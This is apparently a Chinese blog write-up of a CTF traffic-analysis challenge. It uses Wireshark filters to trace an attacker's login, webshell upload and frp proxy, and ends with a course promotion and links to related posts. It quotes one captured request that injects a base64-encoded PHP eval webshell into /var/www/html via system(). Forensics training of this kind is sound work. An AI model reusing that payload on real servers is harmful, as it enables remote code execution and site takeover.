CTF流量分析(1)

最新推荐文章于 2024-07-10 19:25:11 发布
最新推荐文章于 2024-07-10 19:25:11 发布
阅读量263 收藏 7
点赞数 5
分类专栏: 程序员 文章标签: android
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2401_84970385/article/details/138961904
版权

一次CTF流量分析比赛的题解记录。

题目一:找到攻击者登录成功记录,并对密码计算md5,示意:md5(password),提交32位md5值为flag

思路:http.request.method ==“POST” && http contains "php"点击第一个,查看到密码:

题目二:找到攻击者上传WebShell路径,并计算路径的md5,示意:md5(password),提交32位md5值为flag

思路:http.request.method ==“POST” && http contains “php”,追踪流,找到variable=1&tpl=data/Runtime/Logs/Home/21_08_07.log&aaa=system(‘echo PD9waHAgZXZhbCgkX1JFUVVFU1RbZXNGXSk7Pz4=|base64 -d > /var/www/html/1.php’)

题目三:找到攻击者使用的WebShell,并对WebShell密码计算md5,示意:md5(password),提交32位md5值为flag

题目四:黑客上传的代理工具的回连地址端口,并对地址端口计算md5,示意:md5(10.10.10.10:8080),提交32位md5值为flag

思路:先找使用了什么代理工具,再查看代理工具配置文件。http.request.method ==“POST” && http contains “php”,可以看出使用的代理工具为frp,接下来继续追踪流找frpc.ini文件内容,看写入了什么。

找j68071301598f写入的内容,且排除前两位再用base64解密,找到frpc.ini文件

最后

自我介绍一下,小编13年上海交大毕业,曾经在小公司待过,也去过华为、OPPO等大厂,18年进入阿里一直到现在。

深知大多数网络安全工程师,想要提升技能,往往是自己摸索成长,但自己不成体系的自学效果低效又漫长,而且极易碰到天花板技术停滞不前!

因此收集整理了一份《2024年网络安全全套学习资料》,初衷也很简单,就是希望能够帮助到想自学提升又不知道该从何学起的朋友。

img

img

img

img

img

既有适合小白学习的零基础资料,也有适合3年以上经验的小伙伴深入学习提升的进阶课程,基本涵盖了95%以上网络安全知识点!真正的体系化!

如果你觉得这些内容对你有帮助,需要这份全套学习资料的朋友可以戳我获取!!

由于文件比较大,这里只是将部分目录截图出来,每个节点里面都包含大厂面经、学习笔记、源码讲义、实战项目、讲解视频,并且会持续更新!

s/618653875)

由于文件比较大,这里只是将部分目录截图出来,每个节点里面都包含大厂面经、学习笔记、源码讲义、实战项目、讲解视频,并且会持续更新!

2401_84970385
关注
  • 5
    点赞
  • 7
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
CTF流量分析
Kiber
04-19 298
思路:http.request.method =="POST" && http contains "php",追踪流,找到variable=1&tpl=data/Runtime/Logs/Home/21_08_07.log&aaa=system('echo PD9waHAgZXZhbCgkX1JFUVVFU1RbZXNGXSk7Pz4=|base64 -d > /var/www/html/1.php')找j68071301598f写入的内容,且排除前两位再用base64解密,找到frpc.ini文件。
【玄机】-----应急响应
m0_63138919的博客
05-13 2616
玄机应急响应 解 一起学习
CTF流量解http1.pcapng
catch
08-08 1564
里面包含了flag。
CTF Misc(3)流量分析基础以及原理
Ba1_Ma0的博客
10-11 3552
流量分析基础以及原理
CTF流量分析1
qq_45766280的博客
08-26 851
流量分析1解:总结 仅作为学习笔记使用 目:Q3.pcap 解: 先在wireshark里看一下 有HTTP先看HTTP,直接在过滤器中选择HTTP 这些包就有意思了,这些请求有些想目录扫描在不断的请求,而大部分的回应都是404,那么我们暂时推断会有访问成功的,往后面找找吧。 这两个语句成功通过了,那我们来详细分析分析这两个包。追踪流->HTTP GET /?c=print_r(gzcompress(file_get_contents(base64_decode(%22aW5kZXguc
一道冰蝎文件流量分析的例
09-01
在网络安全领域,尤其是CTF(Capture The Flag)竞赛中,冰蝎经常被用于流量分析、数据包嗅探和网络取证。本目的核心是利用冰蝎进行文件流量分析。 首先,我们要理解什么是文件流量分析。文件流量分析是网络安全...
两道CTF流量分析,寻找flag!
03-10
目1:在流量中寻找管理员的密码!...问1:安全审计设备上捕获了一条OPC流量,疑似遭遇黑客攻击,请分析出黑客攻击的流量编号。(仅需找到流量编号即可) 问2:找出藏匿在流量包中的flag(格式为flag{})
启明HW-流量分析
04-24
本资源是启明星辰对于护网的考核目,主要是流量分析方面的实战目。
CTF-流量分析有点难搞
06-14
集团某互联网应用被黑客攻击,重要文件被窃取,管理员抓取了攻击流量包,请协助管理员分析流量包并回答下列问: 被攻击的应用程序使用的密钥是_______(填写应用程序秘钥)
2021-10-12T15_46_29.634969+00_00misc_流量分析.rar
10-21
"2021-10-12T15_46_29.634969+00_00misc_流量分析.rar" 暗示这是一个关于网络安全竞赛(CTF)的挑战,涉及的是流量分析方面的内容。描述提到“CTF附件——MISC类型——数据库登录”,表明该挑战可能需要...
高通平台 android7.1 蓝牙的可见性设置
最新发布
韩家老大的博客
07-10 169
Android7.1 高通 蓝牙 可见性
Android11 窗口动画
littleyards的博客
07-09 689
首先创建LocalAnimationAdapter对象,LocalAnimationAdapter对象中的mSpec成员是WindowAnimationSpec对象,WindowAnimationSpec对象中的mAnimation成员是上一步创建的Animation 对象。首先创建leash图层,然后调用LocalAnimationAdapter的startAnimation继续处理,注意传入的mInnerAnimationFinishedCallback参数,后续动画完成后会回调里面的方法。
android13 rom frameworks 蓝牙自动接收文件
zhutoubenben的专栏
07-10 40
我们从导航栏这里,点开这个蓝牙的接收框,弹出来的对话框,使用android studio 的layout inspector可以发现这个是 Bluetooth里面的对话框进入蓝牙源码先大概的浏览下bluetooth里面的信息,看看有没有Notification之类的一般通知操作方法.setContentTitle("通知").setContentText("收到消息").addAction(R.drawable.icon, "按钮", snoozeIntent )
Android基础知识
double222222的博客
07-06 825
答:ContentProvider是应用程序间数据共享的接口。使用时定义一个类继承ContentProvider,复写query、insert、update、delete等方法。同时需要在manifest中注册,通过uri将数据共享出去。访问者实现ContentResolver来访问。
Android APT实战
我想月薪过万的博客
07-10 460
APT(Annotation Processing Tool)即注解处理器,在编译的时候可以处理注解然后搞一些事情,也可以在编译时生成一些文件之类的。ButterKnife和EventBus都使用了APT技术,如果不会APT技术就很难看懂这两个框架的源码。
安卓备忘录App开发
Asong_6的博客
07-06 451
目标用户: 普通安卓手机用户,需要一个简单易用的备忘录App来记录和管理日常事务。可用作论文设计参考 创建备忘录: 用户可以创建新的备忘录,输入标和内容。 编辑备忘录: 用户可以编辑已有的备忘录。 删除备忘录: 用户可以删除不再需要的备忘录。 查看备忘录: 用户可以查看所有创建的备忘录。 搜索备忘录: 用户可以通过关键词搜索备忘录。 分类管理: 用户可以对备忘录进行分类管理。 备份和恢复: 用户可以备份备忘录数据并在需要时恢复
【安卓学习】文本切换器
m0_73241073的博客
07-08 587
文本切换器的使用
android 居中对齐
xie__jin__cheng的博客
07-09 225
android 居中对齐
ctf流量分析arp
05-30
CTF流量分析ARP是指在网络安全比赛中,通过分析ARP协议的流量来获取关键信息,以便攻击或保护目标系统。ARP协议是用于将IP地址映射到物理地址的协议,通过分析ARP流量可以获得网络拓扑结构、IP地址和MAC地址的对应...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值